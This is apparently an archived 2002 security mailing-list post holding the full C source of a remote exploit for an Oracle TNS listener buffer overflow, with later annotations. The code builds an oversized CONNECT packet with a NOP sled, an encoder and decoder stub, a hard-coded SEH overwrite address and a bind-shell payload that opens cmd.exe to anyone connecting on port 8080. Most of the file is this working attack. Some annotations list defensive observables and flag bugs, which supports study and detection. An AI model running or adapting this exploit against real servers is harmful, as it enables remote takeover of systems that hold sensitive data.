
Oracle TNS SEH Exploit


From: <benjurry () xfocus org>
Date: Wed, 27 Nov 2002 00:54:46 +0800

/*Oracle TNS SEH Exploit By Benjurry.

Oracle Remote Vulnerability discovered by COVERT Labs
Code by benjurry,benjurry () xfocus org
Welcome to http://www.xfocus.net & http://www.xfocus.org
Thanks to my friends Batman, xq and Yuange.
Thanks to the members of Xfocus.
This exploit was only tested on Win2k Chinese + SP2 and Oracle 8.1.7

2001.7.20



*/
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#pragma comment (lib,"Ws2_32")

// Length of the NOP run that marks the end of an embedded routine; main()
// compares FNENDLONG bytes of fnendstr (9 x 0x90) to find these markers.
#define  FNENDLONG     0x08
// x86 NOP opcode; also the byte buff is first filled with.
#define  NOPCODE     0x90
// Number of leading 0x90 bytes placed at the start of buff.
#define  NOPLONG       0x20
// 0x1b00 = 6912 bytes: the size of the SERVICE= value sent in the TNS packet
// and of the local buffers in main() (buff, recvbuff, buffer2).
#define  BUFFSIZE      0x1b00
// Not referenced anywhere in this file.
#define  RETEIPADDRESS 0x0
#define  SHELLPORT     0x1f90  //shell port =8080
// TCP port of the Oracle TNS listener the packet is sent to.
#define PORT 1521

// Decoder stub; never called, its machine code is copied out by main().
void     shellcodefnlock();
// Bind-shell payload body; never called, its machine code is copied out by main().
void     shellcodefn();

// Replaces compiler-inserted calls to _chkesp inside a copied routine with
// register-neutral filler (see the definition at the end of the file).
void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);

/*
 * Entry point.  Builds one oversized TNS CONNECT packet for the host named in
 * argv[1] and sends it to TCP port PORT (1521).  The SERVICE= value of the
 * connect string is the BUFFSIZE-byte buff: a NOPLONG NOP sled, the decoder
 * copied out of shellcodefnlock(), the escaped machine code of shellcodefn()
 * plus its string table, and at offset OVERADD2 the 13 bytes (JMPNEXTJMP,
 * eipwinnt, JMPSHELL) that the title's "SEH" refers to.  Nothing is read
 * back from the target: after send() the program sleeps one second and
 * closes the socket.  Returns 0 on completion; every setup failure exit(1)s.
 *
 * Defensive notes: the address in eipwinnt and the payload are hard-coded
 * for a single platform (header comment: Win2k Chinese SP2, Oracle 8.1.7).
 * On the wire and in listener logs the observable is a CONNECT packet whose
 * CONNECT_DATA carries ~7 KB of 0x90 / 0x42 filler; the vendor fix for the
 * COVERT Labs-reported listener flaw is the mitigation.
 *
 * Known defects in the tool itself (not changed here): buffer2 is BUFFSIZE
 * bytes but receives head + cmd1 + buff + cmd2, so the last two memcpy()s
 * and the send() run past its end; the marker searches never check that a
 * marker was actually found; recvbuff and j are unused.
 */
int main(int argc, char *argv[])
{
 // String table appended after the payload.  The first two bytes are a
 // placeholder for the bind port (overwritten below with SHELLPORT in
 // network order); the payload reads them as a u_short, then walks the
 // NUL-separated names in this order (k = 1..16 in shellcodefn()):
 // 1..7 kernel32 exports, 8 the DLL name passed to LoadLibraryA,
 // 9..16 wsock32 exports, then "cmd.exe" and "exit\r\n".  "strend"
 // only terminates the search below and is not copied.
 char *str="\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0"
       "CreateProcessA""\x0""CloseHandle""\x0"
       "PeekNamedPipe""\x0"
       "ReadFile""\x0""WriteFile""\x0"
       "wsock32.dll""\x0""socket""\x0"
       "bind""\x0""listen""\x0"
       "accept""\x0""send""\x0"
       "recv""\x0""ioctlsocket""\x0"
       "closesocket""\x0"
       "cmd.exe""\x0""exit\x0d\x0a""\x0"
       "strend";


   // End-of-routine marker: FNENDLONG (8) of these 9 NOPs are compared.
   char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  // TNS connect string, split so that buff becomes the SERVICE= value.
  char cmd1[]="(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=status)(ARGUMENTS=3)(SERVICE=";
  char cmd2[]="1)(VERSION=1)))";
  // 58-byte TNS packet header.  Bytes 0-1 (packet length) and 24-25
  // (data length) are patched below, big-endian.
  char head[]="\x00\x59\x00\x00\x01\x00\x00\x00\x01\x36"
   "\x01\x2c\x00\x00\x08\x00\x7f\xff\x7f\x08\x00\x00\x00\x01"
   "\x00\x1f\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
   "\x00\x00\x00\x00\x00\x00\x34\xe6\x00\x00\x00\x01\x00\x00"
   "\x00\x00\x00\x00\x00\x00";
  // Little-endian 0x7ffa0d63: a fixed address valid only on the tested
  // Windows build (see the file header).  This is the fragile part.
  char  eipwinnt[]="\x63\x0d\xfa\x7f";    // jmp ebx

// "jmp +6" (skips the 4 bytes of eipwinnt plus 2 filler) followed by 2 NOPs.
char  JMPNEXTJMP[]="\xeb\x06\x90\x90";
  // "jmp rel32" with displacement 0xffffe72a (-6358): from buff+OVERADD2+13
  // that lands at buff+1, i.e. inside the leading NOP sled.
  char  JMPSHELL[]="\xe9\x2a\xe7\xff\xff";
  
  char    buff[BUFFSIZE];
  char    recvbuff[BUFFSIZE];   // unused
  char    shellcodebuff[0x1000];
   char    *shellcodefnadd,*chkespadd;
     unsigned  char temp;
  int OVERADD2=6346;            // offset in buff of the 13-byte overwrite
  char buffer2[BUFFSIZE];       // NOTE(review): too small for the packet assembled below
  int ret;
 int packetlength;
 int cmdlength;
 int tt,shellcodeport,sendpacketlong;
 int i,j,k;
 int OVERADD=0;                 // extra offset before the NOP sled; always 0 here

 WSADATA WSAData;
 struct hostent          *ht;
 struct sockaddr_in      server;
 memset(buff,NOPCODE,BUFFSIZE);
 printf("Oracle Remote Vulnerability discoveried by COVERT Labs\n");
 printf("Code by benjurry,benjurry () xfocus org\n");
 // NOTE(review): as archived this line carries a stray ';' inside the
 // call and does not compile; probably an artifact of the mailing-list
 // rendering.  Left as posted.
 printf("Welcome to http://www.xfocus.net\n";);
 if(argc<2)
 {
  printf("useage:%s target\n",argv[0]);
exit(1);
 }

 // Winsock 1.1 setup, name resolution and a plain TCP connect to PORT.
 if((tt=WSAStartup(MAKEWORD(1,1), &WSAData)) != 0)
        {
                printf("WSAStartup failed.\n");
    tt=GetLastError();
                WSACleanup();
                exit(1);
        }
if((ht = gethostbyname(argv[1]))==0)
{
                printf("Unable to resolve host %s\n",argv[1]);
                exit(1);
        } 
server.sin_port = htons(PORT);
server.sin_family=AF_INET;
server.sin_addr=*((struct in_addr *)ht->h_addr);
   if((ret = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
                printf("Unable to set up socket\n");
                exit(1);
        }   

if((connect(ret, (struct sockaddr *) &server, sizeof(server))) == -1)
        {
                printf("Unable to connect\n");
                exit(1);
        }
        else
                printf("Connected.\n");
 


 

 



// Resolve the address of the compiler's stack-check helper _chkesp so that
// cleanchkesp() can later strip the calls the compiler inserted into
// shellcodefn().  The mov/cmp pair presumably just forces a reference to
// _chkesp in this build; _chkesp() is then called once to make sure it is
// linked.  Both are MSVC-specific.
_asm{
        mov ESI,ESP
        cmp ESI,ESP
     
  }
 _chkesp();
  chkespadd=(char *)_chkesp;
  temp=*chkespadd;
  // If the symbol resolves to a "jmp rel32" thunk (0xe9), follow the
  // displacement to the real body: target = thunk + 5 + rel32.
  if(temp==0xe9) {
         ++chkespadd;
          i=*(int*)chkespadd;
         chkespadd+=i;
         chkespadd+=4;
  }

  // Same thunk handling for shellcodefnlock().
  shellcodefnadd=(char *)shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }

  // Find the 8-NOP run at the start of shellcodefnlock()'s _asm block.
  // No check that it was found within 0x500 bytes.
  for(k=0;k<=0x500;++k){
       if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }
 



   // buff: 0x42 filler with NOPLONG leading NOPs.
   memset(buff,'\x42',BUFFSIZE);
   for(i=0;i<NOPLONG;i++)
    buff[i]='\x90';

 // Copy 0x80 bytes of the decoder (starting 4 bytes into its NOP marker)
 // right after the NOP sled.
 memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
     
  // Locate the body of shellcodefn() the same way ...
  shellcodefnadd=(char *)shellcodefn;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
    ++shellcodefnadd;
    k=*(int *)shellcodefnadd;
           shellcodefnadd+=k;
    shellcodefnadd+=4;
  }
  

  // ... and measure it up to the 9-NOP marker at the end of its last _asm
  // block; k becomes the payload length.  No check that it was found.
  for(k=0;k<=0x1000;++k){
    if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }

  // Copy the payload, neutralise its _chkesp calls, then append the string
  // table (everything in str before "strend").
  memcpy(shellcodebuff,shellcodefnadd,k);   
  cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
  for(i=0;i<0x400;++i){ 
    if(memcmp(str+i,"strend",6)==0) break;
  }     
  memcpy(shellcodebuff+k,str,i);

  
  // Overwrite the two placeholder bytes at the head of the string table
  // with SHELLPORT in network order; the payload reads them as its bind port.
  shellcodeport=SHELLPORT;
  shellcodeport=htons(shellcodeport);
  *(u_short *)(shellcodebuff+k)=shellcodeport;
  fprintf(stderr,"\n shellport %d",htons(shellcodeport));
  
  sendpacketlong=k+i;
  // Find where the copied decoder ends inside buff (its trailing NOP run);
  // the escaped payload is written from there on.
  for(k=0;k<=0x200;++k){
         if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
  }

 // Escape the payload for transport: any byte <= 0x10, and '0' itself, is
 // emitted as '0' followed by (byte + 0x40).  This is exactly what the
 // decoder loop in shellcodefnlock() reverses (cmp al,0x30 / sub al,0x40).
 // Presumably the connect string cannot carry low control bytes intact.
 // No bound check against OVERADD2.
 for(i=0;i<sendpacketlong;++i){
      temp=shellcodebuff[i];
      if(temp<=0x10||temp=='0'){

       buff[OVERADD+NOPLONG+k]='0';
       ++k;
       temp+=0x40;
      }
      buff[OVERADD+NOPLONG+k]=temp;
      ++k;
}

 
 
   // The 13-byte overwrite at OVERADD2: short jump, fixed address, long
   // jump back into the NOP sled; everything after it is NOPs.
   memcpy(buff+OVERADD2,JMPNEXTJMP,4);
 

// }
memcpy(buff+OVERADD2+4,eipwinnt,4);

 memcpy(buff+OVERADD2+8,JMPSHELL,5);

 for(i=OVERADD2+13;i<BUFFSIZE;i++)
  buff[i]='\x90';


 // Assemble head | cmd1 | buff | cmd2 into buffer2.  sizeof(x)-1 drops the
 // string terminators; the "-3" on the last line folds three of them.
 // NOTE(review): 58 + (sizeof(cmd1)-1) + BUFFSIZE + (sizeof(cmd2)-1) exceeds
 // sizeof(buffer2) (BUFFSIZE), so the next two memcpy()s write past the
 // end of buffer2 and send() below reads past it -- undefined behavior.
 memset(buffer2,'\x90',sizeof(buffer2));
 memcpy(buffer2,head,sizeof(head)-1);
 memcpy(buffer2+sizeof(head)-1,cmd1,sizeof(cmd1)-1);
 memcpy(buffer2+sizeof(head)-1+sizeof(cmd1)-1,buff,sizeof(buff));
 memcpy(buffer2+sizeof(head)+sizeof(cmd1)+sizeof(buff)-3,cmd2,sizeof(cmd2)-1);
  

 // 58 is the header length (sizeof(head)-1); cmdlength is the data part.
 packetlength=58+sizeof(buff)+sizeof(cmd1)+sizeof(cmd2)-3;
 cmdlength=sizeof(buff)+sizeof(cmd1)+sizeof(cmd2)-3;

 // Big-endian length fields of the TNS header.
 buffer2[0]=packetlength>> 8;
 buffer2[1]=packetlength & 0xff;
 buffer2[24]=cmdlength>>8;
 buffer2[25]=cmdlength& 0xff;




  // Single send; a short send is not handled (only -1 is checked).
  if(send(ret, buffer2, packetlength, 0) == -1)
        {
                printf("Unable to send\n");
                exit(1);
        }
        else
        {
                printf("code sented...\n");
                
        }
Sleep(1000);
closesocket(ret);
return 0;


}

/*
 * Decoder stub.  Never called as a C function; only its machine code is
 * used.  main() finds it by the leading 8-NOP marker and copies 0x80 bytes
 * (starting 4 bytes into that marker) to buff+NOPLONG, then overwrites the
 * bytes from the "shell:" NOP run onward with the escaped payload.  So at
 * run time the call/pop at getediadd leaves EDI (and ESI, copied from it)
 * pointing at the first escaped byte: the loop decodes in place for up to
 * 0x0fd0 bytes, treating '0' (0x30) as "next byte minus 0x40", and
 * "jmp shell" then falls into the decoded code.  No parameters, no return.
 */
void  shellcodefnlock()
{
       _asm{
              nop              // 8-NOP marker main() searches for
              nop
              nop
              nop
              nop
              nop
              nop
              nop

              jmp   next
getediadd:              pop   EDI      // EDI = address following the call below
              push  EDI
              pop   ESI                // ESI = EDI: decode in place
              xor   ecx,ecx
              mov   cx,0x0fd0          // bytes to process
looplock:            lodsb
        cmp   al,0x30                  // '0' prefix?
        jnz   sto
                     lodsb             // yes: take the next byte ...
        sub   al,0x40                  // ... and undo the +0x40 from main()
sto:                 stosb
        loop  looplock
        jmp   shell
next:                call  getediadd

shell:         NOP                     // overwritten by the escaped payload
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
              
    }
} 

/*bind cmd.exe  */
/*
 * Bind-shell payload body.  Like shellcodefnlock() it is never called;
 * main() copies its machine code up to the 9-NOP marker at the end of the
 * final _asm block, strips the compiler's _chkesp calls with cleanchkesp(),
 * appends main()'s string table after the marker search point, and the
 * decoder stub unpacks the result on the target.
 *
 * Flow, as far as the code shows it:
 *  1. getstradd pops the address just past the "call getstradd" at the end
 *     of the function -- that is where main() appended the string table --
 *     into stradd, and installs `except` as the current FS:[0] record
 *     (except[2] keeps the previous FS:[0]).
 *  2. Scans memory from imgbase upward in 64 KB steps for a module whose
 *     export-directory name is KERNEL32 (the multi-character constants
 *     'ZM', 'EP', 'NREK', '23LE', 'PteG', 'Acor' compare against the
 *     in-memory bytes "MZ", "PE", "KERNEL32", "GetProcA" on MSVC/x86), and
 *     pulls GetProcAddress out of its export table; faults during the scan
 *     are absorbed by the handler at errprogram.
 *  3. Restores FS:[0]; resolves the 16 API names from the string table
 *     (entry 8 is a DLL name for LoadLibraryA instead).
 *  4. Binds a listening socket to the port carried in the string table
 *     (SHELLPORT, 8080; bumped until bind succeeds), and for every accepted
 *     client spawns "cmd.exe" with its standard handles on two pipes and
 *     relays between socket and pipes until the client disconnects.
 *
 * Host-side observables: a new listening TCP socket in the listener's
 * process, and cmd.exe running as a child of the Oracle listener with
 * redirected stdin/stdout.
 *
 * Relies on MSVC stack layout: apifnadd has one element but indices 1..16
 * are written, landing in the FARPROC locals declared above it in reverse
 * declaration order (closesocketadd ... procloadlib).  No return value;
 * on failure it spins at `die`.
 */
void shellcodefn()
{    char        Buff[0x800];
    int         *except[3];   // [0] next record, [1] handler, [2] saved FS:[0]

    // One slot per string-table entry, in reverse order; filled through
    // apifnadd[k] (see note above).  NOPNOP is slot 8 ("wsock32.dll").
    FARPROC     closesocketadd;
    FARPROC     ioctlsocketadd;
    FARPROC     recvadd;
           FARPROC     sendadd;
           FARPROC     acceptadd;
           FARPROC     listenadd;
           FARPROC     bindadd;
      FARPROC        socketadd;
//    FARPROC     WSAStartupadd;

    FARPROC        NOPNOP;

    FARPROC     WriteFileadd;
    FARPROC     ReadFileadd;
    FARPROC     PeekNamedPipeadd;
    FARPROC     CloseHandleadd;
    FARPROC     CreateProcessadd;
    FARPROC     CreatePipeadd;
    FARPROC     procloadlib;

    FARPROC     apifnadd[1];
    FARPROC     procgetadd=0;  // GetProcAddress once found; 0 = not found
    
    char        *stradd;       // walks the string table appended by main()
    int         imgbase,fnbase,k,l;
    HANDLE      libhandle;   //libwsock32;  
           STARTUPINFO siinfo;
           SOCKET      listenFD,clientFD;
           struct      sockaddr_in server;
           int         iAddrSize = sizeof(server);
    int         lBytesRead;
    u_short     shellcodeport;

           PROCESS_INFORMATION ProcessInformation;
           HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
           SECURITY_ATTRIBUTES sa;
    // Fetch stradd via call/pop and push `except` as the FS:[0] record.
    _asm {     jmp    nextcall
         getstradd:   pop    stradd
                      lea    EDI,except
                    mov    eax,dword ptr FS:[0]
        mov    dword ptr [edi+0x08],eax        // except[2] = old FS:[0]
        mov    dword ptr FS:[0],EDI
                      
    }
       except[0]=0xffffffff;     // end-of-chain marker (see the asm trailer)
       except[1]=stradd-0x07;    // handler = execptprogram (2-byte jmp + 5-byte call before stradd)

       imgbase=0x77e00000;
       // Patches this loop's resume address into the handler's immediate
       // (the 0x11223344 slot at stradd-0xe); see getexceptretadd below.
       _asm{
          call getexceptretadd
       }
// NOTE(review): the comma operator discards `imgbase<0xbffa0000`; only
// `procgetadd==0` controls the loop, so the range bound is ineffective.
for(;imgbase<0xbffa0000,procgetadd==0;){
     imgbase+=0x10000;
     if(imgbase==0x78000000) imgbase=0xbff00000;   // skip ahead; presumably a second candidate range
     if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
    // fnbase: looks like the export directory (PE header + 0x78 -> RVA) made absolute.
    fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
    k=*(int *)(fnbase+0xc)+imgbase;                // exported module name
    if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
        libhandle=imgbase;
       k=imgbase+*(int *)(fnbase+0x20);            // name pointer table
       for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
          if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){
             // Ordinal for name l, adjusted by the export base, then the
             // function RVA -- the +0x24/+0x10/+0x1c fields read like the
             // ordinal table, base and address table of the export directory.
             k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
             k+=*(int *)(fnbase+0x10)-1;
             k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
             procgetadd=k+imgbase;
             break;
           }
        }
    }
        }
    }


  // Unhook: FS:[0] = except[2].
  _asm{
           lea edi,except
           mov eax,dword ptr [edi+0x08]   
    mov dword ptr fs:[0],eax
   }

       
   if(procgetadd==0) goto  die ;

   // First two bytes of the string table: bind port, already network order.
   shellcodeport=*(u_short *)stradd;
   stradd+=2;
   // Resolve entries 1..16; each is followed by one NUL, the inner loop
   // stops at the last NUL before the next name.  libhandle is kernel32
   // for 1..7 and the LoadLibraryA result for 9..16.  After the loop
   // stradd points at "cmd.exe".
   for(k=1;k<17;++k) {
    if(k==8) libhandle=procloadlib(stradd);
    else     apifnadd[k]=procgetadd(libhandle,stradd);
    for(;;++stradd){
         if(*(stradd)==0&&*(stradd+1)!=0) break;
    }
    ++stradd;
   }

//           WSAStartupadd(MAKEWORD(1, 1), &wsaData);

            listenFD = socketadd(AF_INET,SOCK_STREAM,IPPROTO_TCP);
            server.sin_family = AF_INET;
            server.sin_port =shellcodeport;
            //SHELLPORT;
            server.sin_addr.s_addr=0;
        k=1;
     // Retry bind until it returns 0; +0x100 on the network-order port is
     // presumably +1 on the host-order port, with the wrap fixed up.
     while(k!=0){
          k=bindadd(listenFD,&server,sizeof(server));
                 server.sin_port+=0x100;
          if(server.sin_port<0x100) ++server.sin_port;
            }
     listenadd(listenFD,10);

// One cmd.exe per accepted client; never exits on its own.
while(1){
            sa.nLength=12;            // presumably sizeof(SECURITY_ATTRIBUTES) on x86
            sa.lpSecurityDescriptor=0;
            sa.bInheritHandle=TRUE;   // pipes must be inheritable by the child

            CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);   // child stdout/stderr
            CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);   // child stdin

// ZeroMemory(&siinfo,sizeof(siinfo));
            // Zero 0x11 dwords (0x44 bytes) -- presumably sizeof(STARTUPINFO).
            _asm{
                 lea EDI,siinfo
                xor eax,eax
                mov ecx,0x11
                repnz stosd
            }
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;
    siinfo.hStdOutput=hWritePipe1;
    siinfo.hStdError =hWritePipe1;

//   k=0;
//    while(k==0)
//    {
    // stradd == "cmd.exe" here; 5th argument 1 = inherit handles.
    k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
//        stradd+=8;
//    }    
    PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);

    clientFD=acceptadd(listenFD,&server,&iAddrSize);

    // Relay loop: child output -> socket, socket input -> child stdin.
    // Polls with PeekNamedPipe, then blocks in recv when the pipe is empty.
    while(1) {
        PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);
        if(lBytesRead>0) {
              ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
              if(lBytesRead>0) sendadd(clientFD,Buff,lBytesRead,0);
              else sendadd(clientFD,stradd,8,0);   // sends "cmd.exe\0" if the read came back empty
        }
        else {
            lBytesRead=recvadd(clientFD,Buff,1024,0);

            if(lBytesRead<=0){
//                    CloseHandleadd(ProcessInformation.hProcess);  //.dwProcessId);
                   // Client gone: feed "exit\r\n" (stradd+8, 6 bytes) to the
                   // child and go back to accept().
                   lBytesRead=6;
                   WriteFileadd(hWritePipe2,stradd+8,lBytesRead,&lBytesRead,0);
                   closesocketadd(clientFD);
                   break;  
            }
            else{
                   sendadd(clientFD,Buff,lBytesRead,0); 

                   WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
            }
        }
    }
}
  



      die: goto die  ;   // failure: spin forever rather than crash the host process
        _asm{

// Called right before the module scan: the return address (the resume
// point) is written into the handler's immediate at stradd-0x0e.
getexceptretadd:   pop  eax
            push eax
            mov  edi,dword ptr [stradd]
            mov dword ptr [edi-0x0e],eax
            ret
// Exception handler: [esp+0x0c] looks like the CONTEXT argument and
// +0xb8 its Eip; it is set to the patched-in resume address and 0 is
// returned so execution continues there.
errprogram:        mov eax,dword ptr [esp+0x0c]
            add eax,0xb8
            mov dword ptr [eax],0x11223344  //stradd-0xe
            xor eax,eax        //2
            ret        //1
execptprogram:     jmp errprogram    //2 bytes     stradd-7
nextcall:          call getstradd    //5 bytes
            NOP                // 9-NOP end marker main() searches for
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
    }        
}


/*
 * Strip compiler-inserted stack-check calls from a copied routine.
 *
 *   fnadd     - address the routine was copied FROM (call targets are
 *               relative to the original location, not the copy)
 *   shellbuff - the copy; patched in place
 *   chkesp    - resolved address of _chkesp
 *   len       - number of bytes to scan
 *
 * Scans for 0xe8 (call rel32).  When the target, computed as
 * fnadd + i + 5 + rel32, equals chkesp, the 5-byte call is replaced by
 * nop / inc ebx / dec ebx / inc ebx / dec ebx -- 5 bytes that leave every
 * register and flag-dependent control flow unchanged.  No return value.
 *
 * Reads a 4-byte int from an unaligned address and compares pointers into
 * different objects: accepted by MSVC x86, undefined behavior per the C
 * standard.  A 0xe8 that is data rather than an opcode is inspected too;
 * only an exact target match is patched.
 */
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{ 
   int i,k;
   unsigned char temp;
   char *calladd;

   for(i=0;i<len;++i){
       temp=shellbuff[i];
       if(temp==0xe8){
             k=*(int *)(shellbuff+i+1);   // rel32 operand of the call
        calladd=fnadd;
      calladd+=k;
      calladd+=i;
      calladd+=5;                         // call target = next instruction + rel32
      if(calladd==chkesp){
              shellbuff[i]=0x90;
              shellbuff[i+1]=0x43;   // inc ebx
        shellbuff[i+2]=0x4b;    // dec ebx
        shellbuff[i+3]=0x43;
        shellbuff[i+4]=0x4b;
       }
        }
   }
}
